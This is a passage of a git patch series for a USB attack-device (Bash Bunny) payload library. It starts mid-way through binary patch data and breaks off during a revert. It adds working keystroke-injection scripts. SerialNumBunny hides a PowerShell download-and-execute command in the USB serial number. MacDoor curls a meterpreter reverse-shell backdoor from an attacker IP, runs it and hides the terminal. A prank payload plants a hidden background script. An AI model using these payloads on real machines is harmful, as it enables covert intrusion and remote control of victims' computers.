zRQz}?W}V+C5FA`)Ihb}f5YpUuocVe6R$GB(bw8^kBQ}>1UDEEc8396fWf(!-fNb90 zcm}dwm`1$bf*FLx`1sV&&rNo0wuXs9{CXqmkum*L3v-0^FbP7eG{<45Vkb(b1Xx!t zR+DQ{uOvU{mcyT};4qv8AEgv)s4v{`V zZAfu1R8DJ#P!kapRRNJEyFvFPgo$6QE2gzvoJP{tPj)C>Y(PEUd~*x*l`X+;szc9O zMi{@K^^X`;7l90r*E}S`A6}AeX>z{KkQuZaUqBd_n}FjbNAnh1ZZED{RPAr}67>-c z>gd+S-V$gXSE5cZIQ|(A2VqGwwCz^xm8gODO3`X}$zUKa;-|N-jw8uQSeocEqa*<_ zL;2w)2wJehj(2;(93bv?$&SuPlJdo<_}cXs-JW|WN00SqAHdBvFQGo0FrriKn`48g z;=6J44{AKB7tV&i1b2l&c*w83CnAhgcOK~>DrlXW=Or0jb01tKwGk!SFCQTjfNiP zs#KxbgcnA2n^3dG)bec*9MU@C`V&OUmCZ#|^TnvDv7das=jC}#vjGB~b!ji|NBp7JK|p`y+8C!V@S6#3g1^HIr(@BqIENql&g1Dtk|xR*?crfc{3)tHE0@(v9zrm zy_E9Yp{=!DMMm`6e)RFG$4kpLq6e3A2nZRuQxdayt(#F>o+=v!_TIekzKLRbzo-0- zEix@8-)3@uzWmZZO}CRsiSHjBxxN9nySoMl8{+z#K8%a!zdH;xKA_I`VnGf{-q##v zdd*FjC+p2>JECUuiA)RE?-v&1IoJDMhYW4Rl(5WucD4RQQPBT5yk&b@a+U~>K79>4 zPolEf$bnwNNY^`oBMOM1c4tHqE_;o)m#FI~e^c89xRc4oV)vv6Ho~H{qr4R=1iu+e z=A~~P&e^|NlDeoUP)!H1df|;v(&_f_uP-B@(=L^ka{;Vw1_dBel#_XC(=ljBX3x;G z$lYz_zAeaVx}p1OZ>M3yz^?==6op2BSm#fOKn_=jU1jO)_>j(X1N74So82R?p7CF| z*YqlB)-;D^1=5UlPW&niXlW+^3C%PO%%Ih3IL1_tM7|0*J>@a8zr z=j*u=mc|`i+3%G5z;F>qFLn@*CE7Z-AUTU196J88lw1E-$dFOptN%q7iz&$OpVxdk|0-4qFEO6=aswq?S;b46B#vz{xHfXi#ah(b*RBK zf|X)dC0dP_&tkfvD(O9&#|7iF%+;K<;}c=)iGAp1nu-l5q>6G{;cPESyO>=crOLpC6$r(ykyTe15gF$1 zjpd$ay=G3ET~@EEtmX!Mo!n6&QsKGPV%eA!mL1_`o49GshUQp2o#y~E-WrT#(Msm; zk8|do*8SlXb@7HjEDwc!Weq&vI+z`7-rHXv<2Pd-6Fy zM|F1mA^0GrBxOG*(0-H4b9q+B#FvAnwt#QGc`mh**jyT--f`)mU z-pPLQhBCPY2Xg1PX=#4(#eY=Zv&sEc*&?#YQE?cS|FDJfm+mhe$Q_oJpL zEUc}H|E{-09>eA$$RI#2*YXZrKD(wRlb5ux`i0Q9p?~>54QBS{$uV;9%C1UtqBpGK z`1zEP95!3_zf)3my_;X(#2OhF`hS(Fp8agkBsZV=On~WA?&F=!kvR9dY_W;Fag^q$ zDP%Owh}*f4^ZSiozWc~EkTC#AE1x*k-TNS$pK0!HMEs3RKL%-r`Mp(&zug=5S0}S> z?Sv*Yh_AkAG|k4%9>|f#^wwB^h;bN-eQSC0cN7Tzk~tv`S=Q-E{QN~Q5i2;eL9*CE_I&+{(U%20D^-TQo}E!D`JmEkKs}eVFjdx)q@E zE@tadgp>gy28J%J@JJSwC^9zh1Imjg*GT#H5o(Dm2G{Mp@)!7w;p!sUYgYTaMiZRn z96%AUu)chRH2tfQ>2ivo#L;52cpMvczu%bu-q=@r7n6*RrNtO@&D$Kn#Uu|CsU|$~ z#kfNw05204mY-9VHUshG$!TB9S3wiFm} zI3bbk(GT}y^E%R6AsuP*_4F?u!dOb=?pa+D-`x9iJbcxHC}@Z@ z!_RO3qh@f`$z;Gq!SE#7PCBaX^J}2vG;a-gv+*Db{1as8Te<(zG?p9*HiHX{>A{jI zn>yW$>>KAT0pRlQl(Ai7sT}hPY=B$MgKBNO>fMvNcR`TjNF|yeOopom>IvLJ#pU zT1=}U#`a;qb~C1?Pgd2l6n*5|UkHB9c$i8!Tgk`BV!UkNYGwG35wx}#<6)4m*`RY# z!f+h8q)h)EmY;Y@M^--xWp})6F9i0%O<>*;z$L3cqbW$c)t+6SY58we60ZQ0iwt5? zEIHnYX^igUp2fIjn2NG=Wut;mDpi?2_~i$rCgs^b5L&A!JCMQs^H-6-SVHErKsZ51 zuky-IJ~JYjv}eAbUdD4`1DFF{d}hE;-dRW3BSxVE{om67g!ur}W=6?NX^=fKl5LOO<7 zhH`=iKh^dW^JMD0_}+pdMmaBR?qg{rn8u06Ah|F-#`-;X_jW7$6#QQttlE`|%60u| zxFD_9Bl6U_qB$XlE62O0zK;gIrc3Zm0^7rA>02CFFr9(PXq#<{3S8Ys#i*Hh&=L;o zjpHNSG8A}P!)GY~I6@qsr^(O0Fz#rU@Nq(r#3P}(!KfzkY0CLx~p zh|G-^0qx!di%44S`12EK-N8bL~;k~lRQi4X4xoU z{oKNB(hjVBHu+Hx;q{IJ_;Xq;LrO*Vc<9aMYFT=RNEH{D!8RTrD%IIa^{7pKS6xp& z71Cc60B#;(s-}X-uADhW7~)7DlCJ%Uq1#<_RP=l&S$Zg zPFpUCxb}~yOTY9HBapm2$n7<(PWDr;D>*v(Bzfi6R_bEEY50Iph}l7>eaVqjQ@%m_ zys+kBXG>r}oAbozVDU2lY>1k4n3o?-%^p+a!~t=hOsL*ux9hfUX79B=sa4o zg(mD8nq%Avwj@CeX^#n~0DG>a4w$jw{mCxui4ozI%t_)8P2%S)W^!Hlku)|G#16+# z@(R;U`l2|$zw{ebnrkucVvkQVf4N2qF2GF8OfJ$QwTdB6Wy2ZE9W_!KZE&l^Q)5Jm zP1v?_$uiPxKLV~S;Lz9#XBDe4L`S5xKS-~|^{J}XaeffOJ1Hx^o9hI!cZL_LhUB~j zy&ck8VXp1T;j#vId=B%^(lZ7Lu0>bNYPqx6ys{b^|6Y9+jChI@l<$ty@<{dbTnN~v zM3v-&td)j(hF}t_mVSl~RlJvwVPSdO$Ux)a$BO0{?2}CPQ_(6dgWgI?6zGzv? zOL3MOsx$#rJw7Z}n>MYXs1=-NcoCcViW26cTmecE(wfilaOl+_p19?hxay75Cb~cO zHE1LMjkzLCM?+w)>y;9G=tlt0AqwX{ex7euO{7)?MkC14%e#T^)THJteKhGm%O#v0 z6UQ?Z4HX=e;CIG=Y=vX3#s>BM=ui(NJ0$r3>DJ!q_$xMTcb{Ss^$HMZC!TDUh%<6i zH}emkyQ-1!(Ufa@2?0`nF2^I=J`5kHOF^$+J%Zd^Vh#`%Tue2$lIDV5xxu-j&%5nJ^nKBCkik-v6_I{q1#$_Jj<5& zmL(PzlDU3o!Ut95&O09m4!4wPdR;T7>GPl~lPnoPSNItsr!={@GZ4P0%ho$P=5~p~Jxu zGgdCo(S}kUKCo($>1pbFc%m{+CSsd5`aM#wYImkFLnB%S{u}T;*s-v>{p5j}r4lY- zp)R`_(BSuh>G7#Tk?X@erCL#reY5m!qx@&Q9-4wEi2zsbu_1{=1zwH#%w=P|k37PX zvpccat}LH}y8?%^KVv+%h-WXx6a<^^Pcf*!X(g`u_6fce08}nF(L2l{X8v{ ztYobr#XylLQ!aMWK{mbZw5bUV&;GGrAoaeYPbz`ddoNWYo2UYZqiquC%aNy~Ux>Ar}$r1e;x@s!QN3 zTQZC@eAf*Yf)@X&(bNW3#)N@uowF5kKG~6C_WNo+Wg=lGpHx9Rv8l5g>Ux{Q8qLIG z&e?p-D&*2zcf{hQp4ms#@g5QwF2{0yFL47Lv^hd+)!OMY zOQF!_=78Ly;9^aij~hlnI&j(cmB_~rI89|!%C9?*?4|{WoL;I{X_|xcCy21H{)qh> z=O>yd<#}Txe-jACa6K;?%`x|?rp5uh3?+r9*LktC;yq4L8tF+yhKe-DnX8F8&!nF6 ziLATpd<2U8c||I!0|0m*R$~CB6%AOq3{2-d>v*YaO9A{_8kJrE+^{$ZMqK`eFW
xP;G6(*bzxZ+GcC=!0(@I%!WmX+ zO}ok2nF(}L#)cxVs#MFTJPP|*tm_**PA^YI;;&>ZP4f{KzB{`=mWp`)up*&rgDGj| znwYm?nW(>x+T?s7DXVQLNG+dxm31*xY0)5{5eN6*I0jp~u^&$m`WK`1R8#BLy!aA zljXY5Yp{@{rM-yJClupoUs)<49QP7P@^0Z10gtRSZn)?DDq7-@&U&0**>yLuc6pUV8L_7&(`qV*3YCxR8xT7U!Jyh^J};~B26$BCiRuTJF{y%GJEIgYUp`w z@Ml_D!v!KzW#(EQRkcB2l)oq^4(?gdvU z&uvnAKwfX2_~Z&hvdb!*0L|{lfpGCku2~tQCxVJ`!9UDtBA!`ybFB?ec59e=E8eIs zdT9_EfW@4C)!Ai2Ki>8n)Kv)z333vQ>%po_M75*)r^d(6lvwU{-j z$(^ViG@7Awsn|kWp}ASTMAw>Ud39{2d}lZNk5khdoX3rC2I<*wDU1%~k$xFo5eJ}< z$iiCnhIIvGvMPy!IT(F9YFkxMGG2U=F**8epT;wAZ zlOmpAcw#*}K%@hm{ZQyuR6`-M=Zy{uj5hsKh_WARB$$eP^^oMdn7F#Yn|3u`E=z++ zeovmQwg4HhDPqQ?AtCd6D0xGdjH7q0bBbhxxGy;?5Zg8g5~5(BKI}mYO1p@@;fSyp z0P6MMXWp~AW==xJaEy|vzlFx zxNe5}B_U6$BVrd#64uWFA)b;KeyYXQ8D}T)lmvx4Jn9P=Ck1F*UapLsML#gHv;*7u4DnGuol$sk+0Vl_7|iM4PLaM(Qq6j zF6&8N?RV+6Z#t3Bazu)1RY@W`t8a*^iy@a)ELHnmceIwLC!d^d1f3S4HkIg!gn_ zeN6vg5gQ7Iyc@vSh+H9x5{P&7c$$Cj14&~+h08p}0137O+rY*L83trlM)`(^4S`gz z$B0g4Wx6rEHB08Z#7p~pZ*d8VL$GKSoq(F9jI@e{F9s&>SSqen(OhixFIu~@HBSnF z^_6Y?*PWhiJ4_e9 z5}>BpicM)PMmnCUc<|Sql3cCRVBxr6F!Y9HwaLC^oZo1D*y24V2iZDX8Mq3jt+3yk?1T6zx|Vi( zH^VqU)J@Ax6vl;IiO!z)7mka(6r80jzQECXXD3opM1WiPR`Ro7giE-^Kyk9IyvhU( zt1Vu?&qrX&(w(b}rZVegg!+Hn!r8ajc-a)dH01rGbGfM2QoK-EH{bKw+7-gs>XlJq z163SkDcx82Uf(~7d+4O)hJ^*;A(xpGwymr=CZHcC?a$n&y4q0BQ66$fs#C~5VRChXAGeg&0@3`nu&@F$H%OjG#r_a7Bid!gVP%={f zl;?UMOY1jMdm^K?Q20l2T%|0GguTpLkhR95fIR7fXDX37#Y11YcSA zIaSHPUN5$Fnz*mCdtPV?Pa|e8P3+n|P<ihq*-!XuQx{$oA-UAYEvv ze)Wf#N8S2M7ay3jaNO9{(yaX>he=AeYD)eKq$GZQ3w)|D^BcQZ7}EOKK-QD^#RBsb z)|GQ5vh4J8aFe$^+G7yh@J9X%+p!O9vFR$9Jxsd%1kExfnsWwj_=_@>zX9N^)jS=j zIJNiYQS+5|d+=|?WpPc>W@KxVVjtlHkh`mwTW;p|nqqlozU9pzE2s&ornWgf=_fu7 zEgiU&(CCADqt%e7c2?m{Tj+{*r(^)-Zq}=*V(uHUbWLipy0s?kGasu=y}rOu*Q%?? z=bcI=pDEX`xwTFt;I)9s-ltdnY)p zM$XPY>$bp&du`S5a87RZF#=NQ;K^fKjWp5&UN2dX!w#~+rkwNSDPJDZ+;V~N8Hyr? zPdu$%v0MD>4i}^gJSJ(4=qk)ET-bM;y_>1d_XieaZ4_4bIm~QJ<=9#HwMZ5>+hWJU2I4nJynXabHs- z1IaYoi@keB?iwm}{WDcJCX!=McS5N!nncS-?Om9!iyi~(z}%|#p5oYwoRbgbFSLvh z4q+CUKpcDq9f<2neWS-G(rWMJWhw$FEzm6eB13OD&l+!)(O0{J`CUDuNjI~dzKxVX zJ)Rck1yGZ32Pbpb97$mpI8s3{$bv#OzRv?9s?~U7(mugoGoej;#*JzI6WlzRw#b)f znBe$N1+UQYY<|cYW%zU!{BSckWXG_oByE>zR$s>hHDF)0swE(~K{>OKtf`R>km1u* zWj?YUyJ5})Phu+4rDfIk;~Kvj_dt&jYec5o^>!Y4cvIYr-4c!te0W~~O)B%yARGAYgDDHD?Ww2vr4tQ3xEx1z-v zBPhihF;crHJg&`$g_Y%8Y3pN&j9n})BuU|v8aZ0LbIC(fY4bn)sv0)L8xe!Rxh24r zn=Cbw1z#I#szcT#kLEA+jSfWlRI`mXG87f*Im{^8Bsse#6~**F8Q9pt)jZoRK=ngCZ`=4*WH1z!4an7^%Ij^k?GNpW zn6Vr8Hf4w$ q{|1>HbT35zLL7zv|NegmA8w#5Gmp?Xg{TIMSmmWvq>A601pYT6zM}8| literal 0 HcmV?d00001 diff --git a/payloads/library/execution/SerialNumBunny/payload.txt b/payloads/library/execution/SerialNumBunny/payload.txt new file mode 100644 index 00000000..1f177baf --- /dev/null +++ b/payloads/library/execution/SerialNumBunny/payload.txt @@ -0,0 +1,46 @@ +#!/bin/bash +# +# Title: SerialNumBunny +# Description: Execute strings placed in the Bunny serial number +# Author: 0iphor13 +# Version: 1.0 +# Category: Execution +# Attackmodes: HID, RNDIS_ETHERNET + +# Starting as Ethernet device only first to get IP +LED SETUP +ATTACKMODE RNDIS_ETHERNET + +GET SWITCH_POSITION +GET HOST_IP + +# Switch to Ethernet & HID +LED Y +# Defining Device Identifiers - Serialnumber contains payload +ATTACKMODE RNDIS_ETHERNET HID VID_0XF000 PID_0X1234 MAN_HAK5 PROD_BASHBUNNY SN_IWR_-URI_HTTP://$HOST_IP/1.PS1 +cd /root/udisk/payloads/$SWITCH_POSITION/ + +# starting server +LED SPECIAL + +# disallow outgoing dns requests so the server is accessible immediately +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & + +# wait until port is listening +while ! nc -z localhost 80; do sleep 0.2; done + +#Opens hidden powershell instance +Q DELAY 1500 +Q GUI r +Q DELAY 500 +Q STRING "powershell" +Q DELAY 500 +Q ENTER + +Q DELAY 1000 +# Make sure that device ID matches what was defined above +Q STRING "((Get-PnpDevice -PresentOnly -Class USB | Where-Object { \$_.DeviceID -like \"*F000*\" } | ForEach-Object { (\$_).DeviceID -split '\\\\' | Select-Object -Last 1 }) -join '').Replace('_', ' ')|iex|iex" +Q DELAY 400 +Q ENTER +LED FINISH \ No newline at end of file diff --git a/payloads/library/execution/SerialNumBunny/readme.md b/payloads/library/execution/SerialNumBunny/readme.md new file mode 100644 index 00000000..d3d2060b --- /dev/null +++ b/payloads/library/execution/SerialNumBunny/readme.md @@ -0,0 +1,18 @@ +**Title: SerialNumBunny** + +

Author: 0iphor13
+OS: Windows
+Version: 1.0
+ +**What is SerialNumBunny?** + +*It is pretty simple... The BashBunny enables you to set its USB identifiers. You can change VID, PID, Manufacturer and of course, the Serial number. Now we do the little trick here and place our payload within the serial number. Then starting a webserver on the Bunny, where a script is hosted and call the serial number via powershell on the target system. The content of the retrieved script is then executed on the target. Easy as that.* + +You can get pretty creative here, from basically calling basic powershell commands, up to this example where you execute remote scripts. + +**Instruction:** + +- Upload your script or the example provided onto your Bunnys switch folder. +- Plug in the Bunny and let the magic happen. + +_Note: If you want to adapt your payload nested, in the serial number, you may need to stay in a certain character limit. In my case this was 40 characters. This might be different, depending on your target. Also make sure to replace spaces within the serial number with underscores._ From dff31d6a6ad39c7f4e051f79cbdf8b07ab7477de Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Fri, 25 Aug 2023 13:48:33 +0200 Subject: [PATCH 35/56] Update readme.md --- payloads/library/execution/SerialNumBunny/readme.md | 1 + 1 file changed, 1 insertion(+) diff --git a/payloads/library/execution/SerialNumBunny/readme.md b/payloads/library/execution/SerialNumBunny/readme.md index d3d2060b..ac20f5f5 100644 --- a/payloads/library/execution/SerialNumBunny/readme.md +++ b/payloads/library/execution/SerialNumBunny/readme.md @@ -14,5 +14,6 @@ You can get pretty creative here, from basically calling basic powershell comman - Upload your script or the example provided onto your Bunnys switch folder. - Plug in the Bunny and let the magic happen. +![SerialNumBunny](https://github.com/0iphor13/bashbunny-payloads/assets/79219148/fa11d9b5-e2f2-45a9-a701-5a25220ca226) _Note: If you want to adapt your payload nested, in the serial number, you may need to stay in a certain character limit. In my case this was 40 characters. This might be different, depending on your target. Also make sure to replace spaces within the serial number with underscores._ From 5ec93761fda8d3b75feff5aee09eaf47aad7220f Mon Sep 17 00:00:00 2001 From: afsh4ck <132138425+afsh4ck@users.noreply.github.com> Date: Thu, 31 Aug 2023 00:39:59 +0200 Subject: [PATCH 36/56] Create MacDoor - A Python Backdoor for MacOS (#662) * Add files via upload * Update readme.md * Add files via upload * Update readme.md * Update payload.txt --- .../library/execution/MacDoor/payload.txt | 47 +++++++++++++++++++ payloads/library/execution/MacDoor/readme.md | 30 ++++++++++++ .../library/remote_access/MacDoor/payload.txt | 47 +++++++++++++++++++ .../library/remote_access/MacDoor/readme.md | 30 ++++++++++++ 4 files changed, 154 insertions(+) create mode 100644 payloads/library/execution/MacDoor/payload.txt create mode 100644 payloads/library/execution/MacDoor/readme.md create mode 100644 payloads/library/remote_access/MacDoor/payload.txt create mode 100644 payloads/library/remote_access/MacDoor/readme.md diff --git a/payloads/library/execution/MacDoor/payload.txt b/payloads/library/execution/MacDoor/payload.txt new file mode 100644 index 00000000..4c5038fc --- /dev/null +++ b/payloads/library/execution/MacDoor/payload.txt @@ -0,0 +1,47 @@ +#!/bin/bash +# +# Title: MacDoor +# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window. +# Author: afsh4ck +# Version: 1.0 +# Target: MacOS +# Category: Execution +# +# Steps: +# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +# Step 2: mount a local server 'python3 -m http.server' +# Step 3: msfconsole multi/handler listener open before the attack. +# +# Note: +# You need to modify the script with your attacker IP and the port or your local server. +# +# Purple.............Setup +# Yellow blink.......Attack Mode ON +# Green..............Finish + +LED SETUP +ATTACKMODE HID STORAGE ECM_ETHERNET +LED ATTACK + +# Open terminal +QUACK GUI SPACE +QUACK DELAY 500 +QUACK STRING Terminal +QUACK ENTER +QUACK DELAY 3000 + +# Execute attack +QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py +QUACK ENTER +QUACK DELAY 1000 +QUACK STRING cd Downloads +QUACK ENTER +QUACK STRING python3 backdoor.py +QUACK ENTER + +# Minimize terminal +QUACK GUI m +QUACK DELAY 2000 + +# Standby +LED FINISH diff --git a/payloads/library/execution/MacDoor/readme.md b/payloads/library/execution/MacDoor/readme.md new file mode 100644 index 00000000..5e82e9cc --- /dev/null +++ b/payloads/library/execution/MacDoor/readme.md @@ -0,0 +1,30 @@ +# MacDoor - Python Backdoor Execution for the BashBunny + +``` + __ ___ ____ + / |/ /____ _ _____ / __ \ ____ ____ _____ + / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/ + / / / // /_/ // /__ / /_/ // /_/ // /_/ // / +/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/ +``` + +* Author: afsh4ck +* Version: 1.0 +* Target: MacOS +* Tested on: Ventura 13.3.1 +* Category: Execution + +# DESCRIPTION + +Download a Python backdoor from our server, run it in terminal and minimize the terminal window. + +# STEPS + +* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +* Step 2: mount a local server 'python3 -m http.server' +* Step 3: msfconsole multi/handler listener open before the attack. + +# NOTE + +* You need to modify the script with your attacker IP and the port or your local server. + diff --git a/payloads/library/remote_access/MacDoor/payload.txt b/payloads/library/remote_access/MacDoor/payload.txt new file mode 100644 index 00000000..3ed7bfc7 --- /dev/null +++ b/payloads/library/remote_access/MacDoor/payload.txt @@ -0,0 +1,47 @@ +#!/bin/bash +# +# Title: MacDoor +# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window. +# Author: afsh4ck +# Version: 1.0 +# Target: MacOS +# Category: Remote Access +# +# Steps: +# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +# Step 2: mount a local server 'python3 -m http.server' +# Step 3: msfconsole multi/handler listener open before the attack. +# +# Note: +# You need to modify the script with your attacker IP and the port or your local server. +# +# Purple.............Setup +# Yellow blink.......Attack Mode ON +# Green..............Finish + +LED SETUP +ATTACKMODE HID STORAGE ECM_ETHERNET +LED ATTACK + +# Open terminal +QUACK GUI SPACE +QUACK DELAY 500 +QUACK STRING Terminal +QUACK ENTER +QUACK DELAY 3000 + +# Execute attack +QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py +QUACK ENTER +QUACK DELAY 1000 +QUACK STRING cd Downloads +QUACK ENTER +QUACK STRING python3 backdoor.py +QUACK ENTER + +# Minimize terminal +QUACK GUI m +QUACK DELAY 2000 + +# Standby +LED FINISH diff --git a/payloads/library/remote_access/MacDoor/readme.md b/payloads/library/remote_access/MacDoor/readme.md new file mode 100644 index 00000000..7fd07093 --- /dev/null +++ b/payloads/library/remote_access/MacDoor/readme.md @@ -0,0 +1,30 @@ +# MacDoor - Python Backdoor Execution for MacOS + +``` + __ ___ ____ + / |/ /____ _ _____ / __ \ ____ ____ _____ + / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/ + / / / // /_/ // /__ / /_/ // /_/ // /_/ // / +/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/ +``` + +* Author: afsh4ck +* Version: 1.0 +* Target: MacOS +* Tested on: Ventura 13.3.1 +* Category: Remote Access + +# DESCRIPTION + +Download a Python backdoor from our server, run it in terminal and minimize the terminal window. + +# STEPS + +* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +* Step 2: mount a local server 'python3 -m http.server' +* Step 3: msfconsole multi/handler listener open before the attack. + +# NOTE + +* You need to modify the script with your attacker IP and the port or your local server. + From 2c9b668bfad72490e07f67023c0e8c91b2228620 Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Sun, 10 Sep 2023 13:40:44 +0200 Subject: [PATCH 37/56] Add SleepyMacRick MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Installs a script that will listen for user activity in the background. When the user starts working on his machine, a „Rick Roll“ will be triggered. --- .../library/prank/SleepyMacRick/README.md | 17 +++++++++++++ .../library/prank/SleepyMacRick/payload.txt | 25 +++++++++++++++++++ payloads/library/prank/SleepyMacRick/rick.sh | 14 +++++++++++ 3 files changed, 56 insertions(+) create mode 100644 payloads/library/prank/SleepyMacRick/README.md create mode 100644 payloads/library/prank/SleepyMacRick/payload.txt create mode 100644 payloads/library/prank/SleepyMacRick/rick.sh diff --git a/payloads/library/prank/SleepyMacRick/README.md b/payloads/library/prank/SleepyMacRick/README.md new file mode 100644 index 00000000..ff8ada4c --- /dev/null +++ b/payloads/library/prank/SleepyMacRick/README.md @@ -0,0 +1,17 @@ +# SleepyMacRick +* Author: 90N45 +* Version: 1.0 +* Target: Mac +* Attackmodes: HID, STORAGE + +### Description +Installs a script that will listen for user activity in the background. When the user starts working on his machine, a „Rick Roll“ will be triggered. + +### Status +| LED | State | +| --- | --- | +| Magenta solid (SETUP) | Set ATTACKMODE | +| Yellow single blink (ATTACK) | Setup and run script on the Mac | +| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | „Rick Roll“ is ready and listening for activity | + +*Average runtime: 23 seconds* \ No newline at end of file diff --git a/payloads/library/prank/SleepyMacRick/payload.txt b/payloads/library/prank/SleepyMacRick/payload.txt new file mode 100644 index 00000000..be19ac7d --- /dev/null +++ b/payloads/library/prank/SleepyMacRick/payload.txt @@ -0,0 +1,25 @@ +#!/bin/bash + +LED SETUP +ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE + +LED ATTACK +# Open terminal +QUACK GUI SPACE +QUACK DELAY 1000 +QUACK STRING terminal +QUACK ENTER +QUACK DELAY 1500 + +QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/rick.sh /tmp/rick.sh" +QUACK ENTER +QUACK DELAY 1000 + +QUACK STRING "diskutil eject /Volumes/BashBunny/" +QUACK ENTER +QUACK STRING "chmod +x /tmp/rick.sh && nohup bash /tmp/rick.sh &> /dev/null &" +QUACK ENTER +QUACK STRING "killall Terminal" +QUACK ENTER + +LED FINISH \ No newline at end of file diff --git a/payloads/library/prank/SleepyMacRick/rick.sh b/payloads/library/prank/SleepyMacRick/rick.sh new file mode 100644 index 00000000..3c9af0a5 --- /dev/null +++ b/payloads/library/prank/SleepyMacRick/rick.sh @@ -0,0 +1,14 @@ +#! /bin/bash + +sleep 3 +inactive=$(osascript -e 'tell application "System Events" to tell (first process whose frontmost is true) to return name') + +while [[ ${inactive} = $(osascript -e 'tell application "System Events" to tell (first process whose frontmost is true) to return name') ]]; do + sleep 0.5 +done + +osascript -e "set volume output volume 100" +open -u "https://www.youtube.com/watch?v=xvFZjo5PgG0" + +# Self destruct +rm /tmp/rick.sh \ No newline at end of file From f729050548f28ca7a307fdaac31c3b846c593341 Mon Sep 17 00:00:00 2001 From: Dallas Winger <9642419+dallaswinger@users.noreply.github.com> Date: Mon, 18 Sep 2023 12:50:10 -0400 Subject: [PATCH 38/56] Revert "Create MacDoor - A Python Backdoor for MacOS (#662)" This reverts commit 5ec93761fda8d3b75feff5aee09eaf47aad7220f. --- .../library/execution/MacDoor/payload.txt | 47 ------------------- payloads/library/execution/MacDoor/readme.md | 30 ------------ .../library/remote_access/MacDoor/payload.txt | 47 ------------------- .../library/remote_access/MacDoor/readme.md | 30 ------------ 4 files changed, 154 deletions(-) delete mode 100644 payloads/library/execution/MacDoor/payload.txt delete mode 100644 payloads/library/execution/MacDoor/readme.md delete mode 100644 payloads/library/remote_access/MacDoor/payload.txt delete mode 100644 payloads/library/remote_access/MacDoor/readme.md diff --git a/payloads/library/execution/MacDoor/payload.txt b/payloads/library/execution/MacDoor/payload.txt deleted file mode 100644 index 4c5038fc..00000000 --- a/payloads/library/execution/MacDoor/payload.txt +++ /dev/null @@ -1,47 +0,0 @@ -#!/bin/bash -# -# Title: MacDoor -# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window. -# Author: afsh4ck -# Version: 1.0 -# Target: MacOS -# Category: Execution -# -# Steps: -# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py -# Step 2: mount a local server 'python3 -m http.server' -# Step 3: msfconsole multi/handler listener open before the attack. -# -# Note: -# You need to modify the script with your attacker IP and the port or your local server. -# -# Purple.............Setup -# Yellow blink.......Attack Mode ON -# Green..............Finish - -LED SETUP -ATTACKMODE HID STORAGE ECM_ETHERNET -LED ATTACK - -# Open terminal -QUACK GUI SPACE -QUACK DELAY 500 -QUACK STRING Terminal -QUACK ENTER -QUACK DELAY 3000 - -# Execute attack -QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py -QUACK ENTER -QUACK DELAY 1000 -QUACK STRING cd Downloads -QUACK ENTER -QUACK STRING python3 backdoor.py -QUACK ENTER - -# Minimize terminal -QUACK GUI m -QUACK DELAY 2000 - -# Standby -LED FINISH diff --git a/payloads/library/execution/MacDoor/readme.md b/payloads/library/execution/MacDoor/readme.md deleted file mode 100644 index 5e82e9cc..00000000 --- a/payloads/library/execution/MacDoor/readme.md +++ /dev/null @@ -1,30 +0,0 @@ -# MacDoor - Python Backdoor Execution for the BashBunny - -``` - __ ___ ____ - / |/ /____ _ _____ / __ \ ____ ____ _____ - / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/ - / / / // /_/ // /__ / /_/ // /_/ // /_/ // / -/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/ -``` - -* Author: afsh4ck -* Version: 1.0 -* Target: MacOS -* Tested on: Ventura 13.3.1 -* Category: Execution - -# DESCRIPTION - -Download a Python backdoor from our server, run it in terminal and minimize the terminal window. - -# STEPS - -* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py -* Step 2: mount a local server 'python3 -m http.server' -* Step 3: msfconsole multi/handler listener open before the attack. - -# NOTE - -* You need to modify the script with your attacker IP and the port or your local server. - diff --git a/payloads/library/remote_access/MacDoor/payload.txt b/payloads/library/remote_access/MacDoor/payload.txt deleted file mode 100644 index 3ed7bfc7..00000000 --- a/payloads/library/remote_access/MacDoor/payload.txt +++ /dev/null @@ -1,47 +0,0 @@ -#!/bin/bash -# -# Title: MacDoor -# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window. -# Author: afsh4ck -# Version: 1.0 -# Target: MacOS -# Category: Remote Access -# -# Steps: -# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py -# Step 2: mount a local server 'python3 -m http.server' -# Step 3: msfconsole multi/handler listener open before the attack. -# -# Note: -# You need to modify the script with your attacker IP and the port or your local server. -# -# Purple.............Setup -# Yellow blink.......Attack Mode ON -# Green..............Finish - -LED SETUP -ATTACKMODE HID STORAGE ECM_ETHERNET -LED ATTACK - -# Open terminal -QUACK GUI SPACE -QUACK DELAY 500 -QUACK STRING Terminal -QUACK ENTER -QUACK DELAY 3000 - -# Execute attack -QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py -QUACK ENTER -QUACK DELAY 1000 -QUACK STRING cd Downloads -QUACK ENTER -QUACK STRING python3 backdoor.py -QUACK 